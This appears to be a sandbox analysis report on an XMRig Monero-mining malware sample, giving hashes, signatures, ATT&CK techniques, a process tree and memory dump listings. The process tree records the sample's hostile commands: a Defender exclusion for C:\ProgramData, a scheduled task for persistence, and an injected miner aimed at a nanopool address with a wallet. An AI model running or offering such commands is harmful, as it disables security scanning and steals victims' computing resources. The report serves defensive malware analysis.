xmrig | 1a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd

Analysis

max time kernel
92s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
21/11/2022, 22:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.4MB
MD5

4b743ce00d6be4c80149832cf08dee53
SHA1

e1e03b1e788667e8d396a95f4220015445bf40e8
SHA256

1a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd
SHA512

79ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7
SSDEEP

24576:niIWK4wpe2SOR2O+QLBT1o40Tpn6w6mosuUNBVsNIcV8wJ:nil2pe2+OhFT1mpDLnOJ

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/memory/2012-143-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2012-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2012-147-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2012-158-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/2012-162-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2012-165-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
1068	OWT.exe

Loads dropped DLL 1 IoCs

pid	Process
520	cmd.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1068 set thread context of 2012	1068	OWT.exe	39

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1132	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
560	timeout.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2028	powershell.exe
1536	powershell.exe
1068	OWT.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1840	file.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1068	OWT.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeLockMemoryPrivilege	2012	vbc.exe
Token: SeLockMemoryPrivilege	2012	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2012	vbc.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 2028	1840	file.exe	27
PID 1840 wrote to memory of 2028	1840	file.exe	27
PID 1840 wrote to memory of 2028	1840	file.exe	27
PID 1840 wrote to memory of 520	1840	file.exe	29
PID 1840 wrote to memory of 520	1840	file.exe	29
PID 1840 wrote to memory of 520	1840	file.exe	29
PID 520 wrote to memory of 560	520	cmd.exe	31
PID 520 wrote to memory of 560	520	cmd.exe	31
PID 520 wrote to memory of 560	520	cmd.exe	31
PID 520 wrote to memory of 1068	520	cmd.exe	32
PID 520 wrote to memory of 1068	520	cmd.exe	32
PID 520 wrote to memory of 1068	520	cmd.exe	32
PID 1068 wrote to memory of 1536	1068	OWT.exe	33
PID 1068 wrote to memory of 1536	1068	OWT.exe	33
PID 1068 wrote to memory of 1536	1068	OWT.exe	33
PID 1068 wrote to memory of 1904	1068	OWT.exe	35
PID 1068 wrote to memory of 1904	1068	OWT.exe	35
PID 1068 wrote to memory of 1904	1068	OWT.exe	35
PID 1904 wrote to memory of 1132	1904	cmd.exe	37
PID 1904 wrote to memory of 1132	1904	cmd.exe	37
PID 1904 wrote to memory of 1132	1904	cmd.exe	37
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39
PID 1068 wrote to memory of 2012	1068	OWT.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5F50.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:520
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:560
- - C:\ProgramData\winrar\OWT.exe
    "C:\ProgramData\winrar\OWT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1536
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1904
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1132
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
4b743ce00d6be4c80149832cf08dee53

SHA1
e1e03b1e788667e8d396a95f4220015445bf40e8

SHA256
1a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd

SHA512
79ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
4b743ce00d6be4c80149832cf08dee53

SHA1
e1e03b1e788667e8d396a95f4220015445bf40e8

SHA256
1a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd

SHA512
79ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5F50.tmp.bat

Filesize
138B

MD5
fc95bd4f927062c5c092550537f7a67b

SHA1
ac538e741ec6a9b271d2ae9ed81ed47e5371338c

SHA256
968a295dba58104f66549546e761f1ef3c0239b552ea5521d97bd07be6a1874b

SHA512
0d3ff55f90d600b6f13e3e9a3dedfbd2dfaa36064c00372fdc23ac3d283aea238be9736f862d30dd3bb6304526a31cf969d2d537e4c144ea51fd9cd58d03750b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
491bb8b0a35facfc860a9ef1567f263b

SHA1
f5d260d3e5d071cca4efe41cc752816a32bbc29a

SHA256
c9067f2cbbc63c35da4d91855d0ebd7a9c98b49e32dc62c75af0cd01cfaa29cd

SHA512
1b06ba5e0d462cc305eae1dd32e7f7884f23182ff9c683974742e54af2623d8c0113217808c31a5d5ce32125294dd495fb8a59a87c56113b0628b1d0c8280470

Download Submit
\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
4b743ce00d6be4c80149832cf08dee53

SHA1
e1e03b1e788667e8d396a95f4220015445bf40e8

SHA256
1a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd

SHA512
79ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7

Download Submit
memory/1068-102-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/1068-97-0x00000000778D0000-0x00000000779EF000-memory.dmp

Filesize
1.1MB

Download
memory/1068-166-0x000000001C5E6000-0x000000001C605000-memory.dmp

Filesize
124KB

Download
memory/1068-163-0x000000001C5E6000-0x000000001C605000-memory.dmp

Filesize
124KB

Download
memory/1068-137-0x0000000001340000-0x0000000001528000-memory.dmp

Filesize
1.9MB

Download
memory/1068-136-0x000007FEFCF50000-0x000007FEFCFAB000-memory.dmp

Filesize
364KB

Download
memory/1068-135-0x000007FEFD970000-0x000007FEFD9A6000-memory.dmp

Filesize
216KB

Download
memory/1068-134-0x000007FEFB1E0000-0x000007FEFB207000-memory.dmp

Filesize
156KB

Download
memory/1068-133-0x000007FEFD700000-0x000007FEFD725000-memory.dmp

Filesize
148KB

Download
memory/1068-107-0x0000000001340000-0x0000000001528000-memory.dmp

Filesize
1.9MB

Download
memory/1068-132-0x000007FEFAC70000-0x000007FEFACE1000-memory.dmp

Filesize
452KB

Download
memory/1068-131-0x000007FEFAC00000-0x000007FEFAC64000-memory.dmp

Filesize
400KB

Download
memory/1068-130-0x000007FEFE250000-0x000007FEFE29D000-memory.dmp

Filesize
308KB

Download
memory/1068-106-0x000007FEFC0E0000-0x000007FEFC136000-memory.dmp

Filesize
344KB

Download
memory/1068-128-0x000007FEFA3B0000-0x000007FEFA3CC000-memory.dmp

Filesize
112KB

Download
memory/1068-127-0x000007FEFD130000-0x000007FEFD147000-memory.dmp

Filesize
92KB

Download
memory/1068-126-0x000007FEFD280000-0x000007FEFD2A2000-memory.dmp

Filesize
136KB

Download
memory/1068-125-0x000007FEFF0D0000-0x000007FEFF0EF000-memory.dmp

Filesize
124KB

Download
memory/1068-124-0x000007FEFFCA0000-0x000007FEFFD77000-memory.dmp

Filesize
860KB

Download
memory/1068-118-0x000007FEFBE10000-0x000007FEFC025000-memory.dmp

Filesize
2.1MB

Download
memory/1068-109-0x0000000001340000-0x0000000001528000-memory.dmp

Filesize
1.9MB

Download
memory/1068-129-0x000007FEF1860000-0x000007FEF18C2000-memory.dmp

Filesize
392KB

Download
memory/1068-105-0x00000000000E0000-0x0000000000122000-memory.dmp

Filesize
264KB

Download
memory/1068-110-0x000007FEF6C70000-0x000007FEF6D9C000-memory.dmp

Filesize
1.2MB

Download
memory/1068-104-0x000007FEFF690000-0x000007FEFF893000-memory.dmp

Filesize
2.0MB

Download
memory/1068-103-0x000007FEFF0F0000-0x000007FEFF21D000-memory.dmp

Filesize
1.2MB

Download
memory/1068-101-0x000007FEFF8A0000-0x000007FEFF97B000-memory.dmp

Filesize
876KB

Download
memory/1068-100-0x000007FEF6DA0000-0x000007FEF6E97000-memory.dmp

Filesize
988KB

Download
memory/1068-92-0x000007FEF71A0000-0x000007FEF720F000-memory.dmp

Filesize
444KB

Download
memory/1068-93-0x000007FEF7100000-0x000007FEF719C000-memory.dmp

Filesize
624KB

Download
memory/1068-94-0x000007FEFDF70000-0x000007FEFDFD7000-memory.dmp

Filesize
412KB

Download
memory/1068-95-0x00000000779F0000-0x0000000077AEA000-memory.dmp

Filesize
1000KB

Download
memory/1068-96-0x000007FEFDDC0000-0x000007FEFDE5F000-memory.dmp

Filesize
636KB

Download
memory/1068-108-0x0000000001340000-0x0000000001528000-memory.dmp

Filesize
1.9MB

Download
memory/1068-98-0x000007FEFDC40000-0x000007FEFDCAC000-memory.dmp

Filesize
432KB

Download
memory/1068-99-0x000007FEFE1C0000-0x000007FEFE231000-memory.dmp

Filesize
452KB

Download
memory/1536-116-0x000007FEEAAA0000-0x000007FEEB4C3000-memory.dmp

Filesize
10.1MB

Download
memory/1536-119-0x000007FEE9F40000-0x000007FEEAA9D000-memory.dmp

Filesize
11.4MB

Download
memory/1536-120-0x000000001B960000-0x000000001BC5F000-memory.dmp

Filesize
3.0MB

Download
memory/1536-121-0x0000000002A34000-0x0000000002A37000-memory.dmp

Filesize
12KB

Download
memory/1536-122-0x0000000002A3B000-0x0000000002A5A000-memory.dmp

Filesize
124KB

Download
memory/1536-123-0x0000000002A3B000-0x0000000002A5A000-memory.dmp

Filesize
124KB

Download
memory/1840-71-0x0000000000030000-0x0000000000218000-memory.dmp

Filesize
1.9MB

Download
memory/1840-65-0x000007FEF6200000-0x000007FEF6BEC000-memory.dmp

Filesize
9.9MB

Download
memory/1840-64-0x000007FEFF8A0000-0x000007FEFF97B000-memory.dmp

Filesize
876KB

Download
memory/1840-55-0x000007FEF7210000-0x000007FEF727F000-memory.dmp

Filesize
444KB

Download
memory/1840-56-0x000007FEF7170000-0x000007FEF720C000-memory.dmp

Filesize
624KB

Download
memory/1840-73-0x00000000007F0000-0x0000000000832000-memory.dmp

Filesize
264KB

Download
memory/1840-57-0x000007FEFDF70000-0x000007FEFDFD7000-memory.dmp

Filesize
412KB

Download
memory/1840-58-0x00000000779F0000-0x0000000077AEA000-memory.dmp

Filesize
1000KB

Download
memory/1840-59-0x000007FEFDDC0000-0x000007FEFDE5F000-memory.dmp

Filesize
636KB

Download
memory/1840-66-0x0000000000030000-0x0000000000218000-memory.dmp

Filesize
1.9MB

Download
memory/1840-63-0x000007FEF6EA0000-0x000007FEF6F97000-memory.dmp

Filesize
988KB

Download
memory/1840-72-0x000007FEF6D70000-0x000007FEF6E9C000-memory.dmp

Filesize
1.2MB

Download
memory/1840-67-0x00000000007F0000-0x0000000000832000-memory.dmp

Filesize
264KB

Download
memory/1840-68-0x000007FEFF0F0000-0x000007FEFF21D000-memory.dmp

Filesize
1.2MB

Download
memory/1840-81-0x0000000000030000-0x0000000000218000-memory.dmp

Filesize
1.9MB

Download
memory/1840-60-0x00000000778D0000-0x00000000779EF000-memory.dmp

Filesize
1.1MB

Download
memory/1840-79-0x000007FEFF0D0000-0x000007FEFF0EF000-memory.dmp

Filesize
124KB

Download
memory/1840-61-0x000007FEFDC40000-0x000007FEFDCAC000-memory.dmp

Filesize
432KB

Download
memory/1840-62-0x000007FEFE1C0000-0x000007FEFE231000-memory.dmp

Filesize
452KB

Download
memory/1840-69-0x000007FEFF690000-0x000007FEFF893000-memory.dmp

Filesize
2.0MB

Download
memory/1840-70-0x000007FEFC0E0000-0x000007FEFC136000-memory.dmp

Filesize
344KB

Download
memory/2012-143-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-147-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-167-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2012-165-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-164-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2012-162-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-138-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-139-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-141-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2012-145-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2028-84-0x00000000029C4000-0x00000000029C7000-memory.dmp

Filesize
12KB

Download
memory/2028-85-0x00000000029C4000-0x00000000029C7000-memory.dmp

Filesize
12KB

Download
memory/2028-86-0x00000000029CB000-0x00000000029EA000-memory.dmp

Filesize
124KB

Download
memory/2028-82-0x000007FEF6090000-0x000007FEF6BED000-memory.dmp

Filesize
11.4MB

Download
memory/2028-76-0x000007FEEC630000-0x000007FEED053000-memory.dmp

Filesize
10.1MB

Download
memory/2028-83-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/2028-75-0x000007FEFC341000-0x000007FEFC343000-memory.dmp

Filesize
8KB

Download